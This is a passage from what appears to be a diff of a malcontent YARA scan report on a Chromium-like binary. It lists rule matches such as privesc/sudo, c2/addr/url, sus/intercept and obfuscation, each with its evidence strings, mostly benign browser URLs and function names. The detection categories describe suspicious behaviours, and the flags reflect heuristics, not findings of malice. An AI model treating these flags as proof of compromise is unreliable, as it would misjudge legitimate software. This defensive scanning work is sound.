[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code)
[request(url,](https://github.com/search?q=request%28url%2C&type=code) | +| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[request(url,](https://github.com/search?q=request%28url%2C&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscate_location_parse_error](https://github.com/search?q=obfuscate_location_parse_error&type=code)
[obfuscated_field_name](https://github.com/search?q=obfuscated_field_name&type=code)
[obfuscated_file_util](https://github.com/search?q=obfuscated_file_util&type=code)
[obfuscated_name](https://github.com/search?q=obfuscated_name&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://127.0.0.1](http://127.0.0.1)
[http://Descriptionrelatively](http://Descriptionrelatively)
[http://according](http://according)
[http://addEventListenerresponsible](http://addEventListenerresponsible)
[http://ak.apnstatic.com/media/images/favicon_search](http://ak.apnstatic.com/media/images/favicon_search)
[http://applicationslink](http://applicationslink)
[http://arianna.libero.it/search/abin/integrata.cgi](http://arianna.libero.it/search/abin/integrata.cgi)
[http://autocomplete.nigma.ru/complete/query_help.php](http://autocomplete.nigma.ru/complete/query_help.php)
[http://buscador.softonic.com/](http://buscador.softonic.com/)
[http://buscador.terra.es/Default.aspx](http://buscador.terra.es/Default.aspx)
[http://buscador.terra.es/favicon.ico](http://buscador.terra.es/favicon.ico)
[http://buscar.terra.com.ar/Default.aspx](http://buscar.terra.com.ar/Default.aspx)
[http://buscar.terra.com.ar/favicon.ico](http://buscar.terra.com.ar/favicon.ico)
[http://certificates.godaddy.com/repository/gd_intermediate.crt0](http://certificates.godaddy.com/repository/gd_intermediate.crt0)
[http://certificates.godaddy.com/repository100.](http://certificates.godaddy.com/repository100.)
[http://clients3.google.com/cert_upload_json](http://clients3.google.com/cert_upload_json)
[http://code.google.com/p/closure](http://code.google.com/p/closure)
[http://crbug.com/1138528](http://crbug.com/1138528)
[http://crbug.com/660005.](http://crbug.com/660005.)
[http://crl.comodo.net/AAACertificateServices.crl0](http://crl.comodo.net/AAACertificateServices.crl0)
[http://crl.comodoca.com/AAACertificateServices.crl06](http://crl.comodoca.com/AAACertificateServices.crl06)
[http://crl.comodoca.com/COMODOCertificationAuthority.crl0](http://crl.comodoca.com/COMODOCertificationAuthority.crl0)
[http://crl.globalsign.net/root](http://crl.globalsign.net/root)
[http://crl.godaddy.com/gds1](http://crl.godaddy.com/gds1)
[http://csp.yahoo.com/beacon/csp](http://csp.yahoo.com/beacon/csp)
[http://dictionaryperceptionrevolutionfoundationpx](http://dictionaryperceptionrevolutionfoundationpx)
[http://dts.search](http://dts.search)
[http://en.softonic.com/s/](http://en.softonic.com/s/)
[http://encoding=](http://encoding=)
[http://exslt.org/common](http://exslt.org/common)
[http://familiar](http://familiar)
[http://feed.snap.do/](http://feed.snap.do/)
[http://feed.snapdo.com/](http://feed.snapdo.com/)
[http://feross.org](http://feross.org)
[http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png](http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png)
[http://g1.delphi.lv/favicon.ico](http://g1.delphi.lv/favicon.ico)
[http://hladaj.atlas.sk/fulltext/](http://hladaj.atlas.sk/fulltext/)
[http://html4/loose.dtd](http://html4/loose.dtd)
[http://i.rl0.ru/2011/icons/rambler.ico](http://i.rl0.ru/2011/icons/rambler.ico)
[http://i.wp.pl/a/i/stg/500/favicon.ico](http://i.wp.pl/a/i/stg/500/favicon.ico)
[http://icl.com/saxon](http://icl.com/saxon)
[http://imEnglish](http://imEnglish)
[http://imgs.sapo.pt/images/sapo.ico](http://imgs.sapo.pt/images/sapo.ico)
[http://interested](http://interested)
[http://interpreted](http://interpreted)
[http://iparticipation](http://iparticipation)
[http://isearch.avg.com/search](http://isearch.avg.com/search)
[http://l.twimg.com/i/hpkp_report](http://l.twimg.com/i/hpkp_report)
[http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico](http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico)
[http://localhost](http://localhost)
[http://mathematicsmargin](http://mathematicsmargin)
[http://mixidj.delta](http://mixidj.delta)
[http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico](http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico)
[http://mysearch.sweetpacks.com/](http://mysearch.sweetpacks.com/)
[http://mystart.incredibar.com/](http://mystart.incredibar.com/)
[http://narwhaljs.org](http://narwhaljs.org)
[http://navigation](http://navigation)
[http://nigma.ru/themes/nigma/img/favicon.ico](http://nigma.ru/themes/nigma/img/favicon.ico)
[http://nl.softonic.com/s/](http://nl.softonic.com/s/)
[http://nova.rambler.ru/search](http://nova.rambler.ru/search)
[http://nova.rambler.ru/suggest](http://nova.rambler.ru/suggest)
[http://ns.adobe.com/AcrobatAdhocWorkflow/1.0/](http://ns.adobe.com/AcrobatAdhocWorkflow/1.0/)
[http://ns.adobe.com/data](http://ns.adobe.com/data)
[http://ns.adobe.com/pdf/1.3/](http://ns.adobe.com/pdf/1.3/)
[http://ns.adobe.com/xap/1.0/mm/](http://ns.adobe.com/xap/1.0/mm/)
[http://ns.adobe.com/xdp/pdf/](http://ns.adobe.com/xdp/pdf/)
[http://ns.adobe.com/xfdf/](http://ns.adobe.com/xfdf/)
[http://ns.adobe.com/xmpmeta/](http://ns.adobe.com/xmpmeta/)
[http://ocsp.godaddy.com/0J](http://ocsp.godaddy.com/0J)
[http://ok.hu/gfx/favicon.ico](http://ok.hu/gfx/favicon.ico)
[http://ok.hu/katalogus](http://ok.hu/katalogus)
[http://pesquisa.sapo.pt/livesapo](http://pesquisa.sapo.pt/livesapo)
[http://purl.org/dc/elements/1.1/](http://purl.org/dc/elements/1.1/)
[http://radce.centrum.cz/](http://radce.centrum.cz/)
[http://search.avg.com/favicon.ico](http://search.avg.com/favicon.ico)
[http://search.avg.com/route/](http://search.avg.com/route/)
[http://search.avg.com/search](http://search.avg.com/search)
[http://search.babylon.com/favicon.ico](http://search.babylon.com/favicon.ico)
[http://search.babylon.com/home](http://search.babylon.com/home)
[http://search.conduit.com/Results.aspx](http://search.conduit.com/Results.aspx)
[http://search.goo.ne.jp/sgt.jsp](http://search.goo.ne.jp/sgt.jsp)
[http://search.goo.ne.jp/web.jsp](http://search.goo.ne.jp/web.jsp)
[http://search.imesh.net/favicon.ico](http://search.imesh.net/favicon.ico)
[http://search.imesh.net/music](http://search.imesh.net/music)
[http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx](http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx)
[http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx](http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx)
[http://search.iminent.com/Shared/Images/favicon_gl.ico](http://search.iminent.com/Shared/Images/favicon_gl.ico)
[http://search.incredibar.com/favicon.ico](http://search.incredibar.com/favicon.ico)
[http://search.incredibar.com/search.php](http://search.incredibar.com/search.php)
[http://search.snap.do/](http://search.snap.do/)
[http://search.snapdo.com/](http://search.snapdo.com/)
[http://search.softonic.com/img/favicon.ico](http://search.softonic.com/img/favicon.ico)
[http://search.sweetim.com/favicon.ico](http://search.sweetim.com/favicon.ico)
[http://search.sweetim.com/search.asp](http://search.sweetim.com/search.asp)
[http://search.tut.by/favicon.ico](http://search.tut.by/favicon.ico)
[http://search.walla.co.il/](http://search.walla.co.il/)
[http://searchatlas.centrum.cz/](http://searchatlas.centrum.cz/)
[http://searchfunmoods.com/favicon.ico](http://searchfunmoods.com/favicon.ico)
[http://searchfunmoods.com/results.php](http://searchfunmoods.com/results.php)
[http://site_name](http://site_name)
[http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js](http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js)
[http://start.iminent.com/StartWeb/1033/homepage/](http://start.iminent.com/StartWeb/1033/homepage/)
[http://start.sweetpacks.com/favicon.ico](http://start.sweetpacks.com/favicon.ico)
[http://start.sweetpacks.com/search.asp](http://start.sweetpacks.com/search.asp)
[http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico](http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico)
[http://staticsuggested](http://staticsuggested)
[http://suggest.yandex.ru/suggest](http://suggest.yandex.ru/suggest)
[http://szukaj.wp.pl/szukaj.html](http://szukaj.wp.pl/szukaj.html)
[http://tools.ietf.org/html/rfc3986](http://tools.ietf.org/html/rfc3986)
[http://unisolated.invalid](http://unisolated.invalid)
[http://userguide.icu](http://userguide.icu)
[http://wpad/wpad.dat](http://wpad/wpad.dat)
[http://www./div](http://www./div)
[http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html](http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html)
[http://www.C//DTD](http://www.C//DTD)
[http://www.aiim.org/pdfa/ns/id/](http://www.aiim.org/pdfa/ns/id/)
[http://www.apache.org/licenses/LICENSE](http://www.apache.org/licenses/LICENSE)
[http://www.brynosaurus.com/cachedir/](http://www.brynosaurus.com/cachedir/)
[http://www.color.org](http://www.color.org)
[http://www.conduit.com/favicon.ico](http://www.conduit.com/favicon.ico)
[http://www.conduit.com/search](http://www.conduit.com/search)
[http://www.delfi.lt/paieska/](http://www.delfi.lt/paieska/)
[http://www.delfi.lv/search_all/](http://www.delfi.lv/search_all/)
[http://www.delta](http://www.delta)
[http://www.example.com](http://www.example.com)
[http://www.hortcut](http://www.hortcut)
[http://www.ibm.com/data/dtd/v11/ibmxhtml1](http://www.ibm.com/data/dtd/v11/ibmxhtml1)
[http://www.icon](http://www.icon)
[http://www.iec.ch](http://www.iec.ch)
[http://www.ietf.org/id/draft](http://www.ietf.org/id/draft)
[http://www.interpretation](http://www.interpretation)
[http://www.jclark.com/xt](http://www.jclark.com/xt)
[http://www.language=](http://www.language=)
[http://www.midnight](http://www.midnight)
[http://www.neti.ee/api/suggestOS](http://www.neti.ee/api/suggestOS)
[http://www.neti.ee/cgi](http://www.neti.ee/cgi)
[http://www.neti.ee/favicon.ico](http://www.neti.ee/favicon.ico)
[http://www.search.delta](http://www.search.delta)
[http://www.searchnu.com/favicon.ico](http://www.searchnu.com/favicon.ico)
[http://www.searchnu.com/web](http://www.searchnu.com/web)
[http://www.softonic.com.br/s/](http://www.softonic.com.br/s/)
[http://www.softonic.com/s/](http://www.softonic.com/s/)
[http://www.squid](http://www.squid)
[http://www.style=](http://www.style=)
[http://www.text](http://www.text)
[http://www.w3.org/1998/Math/MathML](http://www.w3.org/1998/Math/MathML)
[http://www.w3.org/1999/02/22](http://www.w3.org/1999/02/22)
[http://www.w3.org/1999/XSL/Transform](http://www.w3.org/1999/XSL/Transform)
[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml)
[http://www.w3.org/1999/xlink](http://www.w3.org/1999/xlink)
[http://www.w3.org/2000/09/xmldsig](http://www.w3.org/2000/09/xmldsig)
[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg)
[http://www.w3.org/2000/xmlns/](http://www.w3.org/2000/xmlns/)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://www.w3.org/2002/08/xquery](http://www.w3.org/2002/08/xquery)
[http://www.w3.org/Graphics/SVG](http://www.w3.org/Graphics/SVG)
[http://www.w3.org/TR/1999/REC](http://www.w3.org/TR/1999/REC)
[http://www.w3.org/TR/REC](http://www.w3.org/TR/REC)
[http://www.w3.org/TR/html4/frameset.dtd](http://www.w3.org/TR/html4/frameset.dtd)
[http://www.w3.org/TR/html4/loose.dtd](http://www.w3.org/TR/html4/loose.dtd)
[http://www.w3.org/TR/html4/strict.dtd](http://www.w3.org/TR/html4/strict.dtd)
[http://www.w3.org/TR/xhtml1/DTD/xhtml1](http://www.w3.org/TR/xhtml1/DTD/xhtml1)
[http://www.w3.org/XML/1998/namespace](http://www.w3.org/XML/1998/namespace)
[http://www.w3.org/shortcut](http://www.w3.org/shortcut)
[http://www.walla.co.il/favicon.ico](http://www.walla.co.il/favicon.ico)
[http://www.webrtc.org/experiments/rtp](http://www.webrtc.org/experiments/rtp)
[http://www.wencodeURIComponent](http://www.wencodeURIComponent)
[http://www.xfa.com/schema/xfa](http://www.xfa.com/schema/xfa)
[http://www.xfa.org/schema/xci/](http://www.xfa.org/schema/xci/)
[http://www.xfa.org/schema/xdc/](http://www.xfa.org/schema/xdc/)
[http://www.xfa.org/schema/xfa](http://www.xfa.org/schema/xfa)
[http://www.years](http://www.years)
[http://www.yhs.delta](http://www.yhs.delta)
[http://www.zoznam.sk/hladaj.fcgi](http://www.zoznam.sk/hladaj.fcgi)
[http://www1.delta](http://www1.delta)
[http://www2.delta](http://www2.delta)
[http://www2.public](http://www2.public)
[http://xmlsoft.org/XSLT/namespace](http://xmlsoft.org/XSLT/namespace)
[https://ac.ecosia.org/autocomplete](https://ac.ecosia.org/autocomplete)
[https://ac.search.naver.com/nx/ac](https://ac.search.naver.com/nx/ac)
[https://alekberg.net/privacy](https://alekberg.net/privacy)
[https://android.com/pay](https://android.com/pay)
[https://aomediacodec.github.io/av1](https://aomediacodec.github.io/av1)
[https://api.oceanhero.today/suggestions](https://api.oceanhero.today/suggestions)
[https://api.qwant.com/api/suggest/](https://api.qwant.com/api/suggest/)
[https://ar.search.yahoo.com/favicon.ico](https://ar.search.yahoo.com/favicon.ico)
[https://ar.search.yahoo.com/search](https://ar.search.yahoo.com/search)
[https://ar.search.yahoo.com/sugg/chrome](https://ar.search.yahoo.com/sugg/chrome)
[https://at.search.yahoo.com/favicon.ico](https://at.search.yahoo.com/favicon.ico)
[https://at.search.yahoo.com/search](https://at.search.yahoo.com/search)
[https://at.search.yahoo.com/sugg/chrome](https://at.search.yahoo.com/sugg/chrome)
[https://au.search.yahoo.com/favicon.ico](https://au.search.yahoo.com/favicon.ico)
[https://au.search.yahoo.com/search](https://au.search.yahoo.com/search)
[https://au.search.yahoo.com/sugg/chrome](https://au.search.yahoo.com/sugg/chrome)
[https://beacons.gcp.gvt2.com/domainreliability/upload](https://beacons.gcp.gvt2.com/domainreliability/upload)
[https://beacons.gvt2.com/domainreliability/upload](https://beacons.gvt2.com/domainreliability/upload)
[https://beacons2.gvt2.com/domainreliability/upload](https://beacons2.gvt2.com/domainreliability/upload)
[https://beacons3.gvt2.com/domainreliability/upload](https://beacons3.gvt2.com/domainreliability/upload)
[https://beacons4.gvt2.com/domainreliability/upload](https://beacons4.gvt2.com/domainreliability/upload)
[https://beacons5.gvt2.com/domainreliability/upload](https://beacons5.gvt2.com/domainreliability/upload)
[https://beacons5.gvt3.com/domainreliability/upload](https://beacons5.gvt3.com/domainreliability/upload)
[https://bit.ly/3rpDuEX.](https://bit.ly/3rpDuEX.)
[https://bit.ly/audio](https://bit.ly/audio)
[https://blog.chromium.org/2019/10/no](https://blog.chromium.org/2019/10/no)
[https://br.search.yahoo.com/favicon.ico](https://br.search.yahoo.com/favicon.ico)
[https://br.search.yahoo.com/search](https://br.search.yahoo.com/search)
[https://br.search.yahoo.com/sugg/chrome](https://br.search.yahoo.com/sugg/chrome)
[https://bugs.chromium.org/p/chromium/issues/detail](https://bugs.chromium.org/p/chromium/issues/detail)
[https://bugs.chromium.org/p/dawn/issues/detail](https://bugs.chromium.org/p/dawn/issues/detail)
[https://bugs.chromium.org/p/v8/issues/detail](https://bugs.chromium.org/p/v8/issues/detail)
[https://buscador.softonic.com/](https://buscador.softonic.com/)
[https://buscador.terra.com.ar/Default.aspx](https://buscador.terra.com.ar/Default.aspx)
[https://buscador.terra.es/Default.aspx](https://buscador.terra.es/Default.aspx)
[https://c.android.clients.google.com/](https://c.android.clients.google.com/)
[https://c.bigcache.googleapis.com/](https://c.bigcache.googleapis.com/)
[https://c.docs.google.com/](https://c.docs.google.com/)
[https://c.drive.google.com/](https://c.drive.google.com/)
[https://c.googlesyndication.com/](https://c.googlesyndication.com/)
[https://c.pack.google.com/](https://c.pack.google.com/)
[https://c.play.google.com/](https://c.play.google.com/)
[https://c.youtube.com/](https://c.youtube.com/)
[https://ca.search.yahoo.com/favicon.ico](https://ca.search.yahoo.com/favicon.ico)
[https://ca.search.yahoo.com/search](https://ca.search.yahoo.com/search)
[https://ca.search.yahoo.com/sugg/chrome](https://ca.search.yahoo.com/sugg/chrome)
[https://cdn.ecosia.org/assets/images/ico/favicon.ico](https://cdn.ecosia.org/assets/images/ico/favicon.ico)
[https://ch.search.yahoo.com/favicon.ico](https://ch.search.yahoo.com/favicon.ico)
[https://ch.search.yahoo.com/search](https://ch.search.yahoo.com/search)
[https://ch.search.yahoo.com/sugg/chrome](https://ch.search.yahoo.com/sugg/chrome)
[https://chrome.cloudflare](https://chrome.cloudflare)
[https://chrome.google.com/webstore](https://chrome.google.com/webstore)
[https://chromium.dns.nextdns.io](https://chromium.dns.nextdns.io)
[https://chromium.googlesource.com/chromium/src/](https://chromium.googlesource.com/chromium/src/)
[https://cl.search.yahoo.com/favicon.ico](https://cl.search.yahoo.com/favicon.ico)
[https://cl.search.yahoo.com/search](https://cl.search.yahoo.com/search)
[https://cl.search.yahoo.com/sugg/chrome](https://cl.search.yahoo.com/sugg/chrome)
[https://cleanbrowsing.org/privacy](https://cleanbrowsing.org/privacy)
[https://clients2.google.com/domainreliability/upload](https://clients2.google.com/domainreliability/upload)
[https://clients2.google.com/service/update2/crx](https://clients2.google.com/service/update2/crx)
[https://clients3.google.com/ct_upload](https://clients3.google.com/ct_upload)
[https://co.search.yahoo.com/favicon.ico](https://co.search.yahoo.com/favicon.ico)
[https://co.search.yahoo.com/search](https://co.search.yahoo.com/search)
[https://co.search.yahoo.com/sugg/chrome](https://co.search.yahoo.com/sugg/chrome)
[https://coccoc.com/favicon.ico](https://coccoc.com/favicon.ico)
[https://coccoc.com/search](https://coccoc.com/search)
[https://code.google.com/p/chromium/issues/detail](https://code.google.com/p/chromium/issues/detail)
[https://console.spec.whatwg.org/](https://console.spec.whatwg.org/)
[https://crbug.com/1025266](https://crbug.com/1025266)
[https://crbug.com/1038223.](https://crbug.com/1038223.)
[https://crbug.com/1053756](https://crbug.com/1053756)
[https://crbug.com/1144908.](https://crbug.com/1144908.)
[https://crbug.com/1154140](https://crbug.com/1154140)
[https://crbug.com/1161355](https://crbug.com/1161355)
[https://crbug.com/1214923](https://crbug.com/1214923)
[https://crbug.com/1302249](https://crbug.com/1302249)
[https://crbug.com/1313172](https://crbug.com/1313172)
[https://crbug.com/401439](https://crbug.com/401439)
[https://crbug.com/619103.](https://crbug.com/619103.)
[https://crbug.com/638180.](https://crbug.com/638180.)
[https://crbug.com/824383](https://crbug.com/824383)
[https://crbug.com/824647](https://crbug.com/824647)
[https://crbug.com/927119](https://crbug.com/927119)
[https://crbug.com/981419](https://crbug.com/981419)
[https://crbug.com/dawn/1016](https://crbug.com/dawn/1016)
[https://crbug.com/dawn/1071](https://crbug.com/dawn/1071)
[https://crbug.com/dawn/1203](https://crbug.com/dawn/1203)
[https://crbug.com/dawn/1264](https://crbug.com/dawn/1264)
[https://crbug.com/dawn/1302](https://crbug.com/dawn/1302)
[https://crbug.com/dawn/1305](https://crbug.com/dawn/1305)
[https://crbug.com/dawn/136](https://crbug.com/dawn/136)
[https://crbug.com/dawn/145](https://crbug.com/dawn/145)
[https://crbug.com/dawn/155](https://crbug.com/dawn/155)
[https://crbug.com/dawn/193](https://crbug.com/dawn/193)
[https://crbug.com/dawn/237](https://crbug.com/dawn/237)
[https://crbug.com/dawn/271](https://crbug.com/dawn/271)
[https://crbug.com/dawn/286](https://crbug.com/dawn/286)
[https://crbug.com/dawn/342](https://crbug.com/dawn/342)
[https://crbug.com/dawn/343](https://crbug.com/dawn/343)
[https://crbug.com/dawn/36](https://crbug.com/dawn/36)
[https://crbug.com/dawn/402](https://crbug.com/dawn/402)
[https://crbug.com/dawn/42](https://crbug.com/dawn/42)
[https://crbug.com/dawn/434](https://crbug.com/dawn/434)
[https://crbug.com/dawn/480](https://crbug.com/dawn/480)
[https://crbug.com/dawn/56](https://crbug.com/dawn/56)
[https://crbug.com/dawn/582](https://crbug.com/dawn/582)
[https://crbug.com/dawn/633](https://crbug.com/dawn/633)
[https://crbug.com/dawn/666](https://crbug.com/dawn/666)
[https://crbug.com/dawn/667](https://crbug.com/dawn/667)
[https://crbug.com/dawn/673](https://crbug.com/dawn/673)
[https://crbug.com/dawn/776](https://crbug.com/dawn/776)
[https://crbug.com/dawn/792](https://crbug.com/dawn/792)
[https://crbug.com/dawn/838](https://crbug.com/dawn/838)
[https://crbug.com/dawn/840](https://crbug.com/dawn/840)
[https://crbug.com/dawn/960](https://crbug.com/dawn/960)
[https://crbug.com/new](https://crbug.com/new)
[https://crbug.com/tint.](https://crbug.com/tint.)
[https://crbug.com/tint/1003](https://crbug.com/tint/1003)
[https://crbug.com/v8/7848](https://crbug.com/v8/7848)
[https://crbug.com/v8/8520](https://crbug.com/v8/8520)
[https://creativecommons.org/licenses/by](https://creativecommons.org/licenses/by)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js)
[https://datatracker.ietf.org/doc/draft](https://datatracker.ietf.org/doc/draft)
